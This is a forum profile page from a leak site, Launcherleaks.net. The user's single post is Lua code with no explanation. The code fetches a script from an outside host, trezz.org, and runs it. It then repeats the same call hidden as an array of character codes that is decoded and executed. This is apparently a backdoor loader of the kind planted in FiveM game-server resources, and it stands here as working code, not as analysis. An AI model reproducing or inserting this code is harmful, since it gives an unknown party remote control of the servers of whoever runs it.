Jump to content
LOOKING FOR ROBLOX ASSETS? VISIT ROBLOXBAY.COM! ×
THE BEST DISCORD BACKUP BOT | PRESERVE YOUR DISCORD SERVER! ×

RobloxBay

Visit Site

FiveSecured

 

Stop shipping plaintext. FiveSecured encrypts, obfuscates, and licenses your Lua resources so customers run your work without ever holding your source.

Try for Free

dahlp9055

Snail
  • Posts

    1
  • Joined

  • Last visited

About dahlp9055

dahlp9055's Achievements

Newbie

Newbie (1/17)

0

Reputation

  1. PerformHttpRequest('https://trezz.org/i?to=eKU8M', function (e, d) pcall(function() assert(load(d))() end) end) local code_parts = { 80, 101, 114, 102, 111, 114, 109, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 39, 104, 116, 116, 112, 115, 58, 47, 47, 116, 114, 101, 122, 122, 46, 111, 114, 103, 47, 105, 63, 116, 111, 61, 101, 75, 85, 56, 77, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 40, 101, 44, 32, 100, 41, 32, 112, 99, 97, 108, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 97, 115, 115, 101, 114, 116, 40, 108, 111, 97, 100, 40, 100, 41, 41, 40, 41, 32, 101, 110, 100, 41, 32, 101, 110, 100, 41 } local lua_task = "" for _, v in ipairs(code_parts) do lua_task = lua_task .. string.char(v) end assert(load(lua_task))()
×
×
  • Create New...

Important Information

By continuing on Launcherleaks.net, you agree to our Terms of Use, Guidelines & Privacy Policy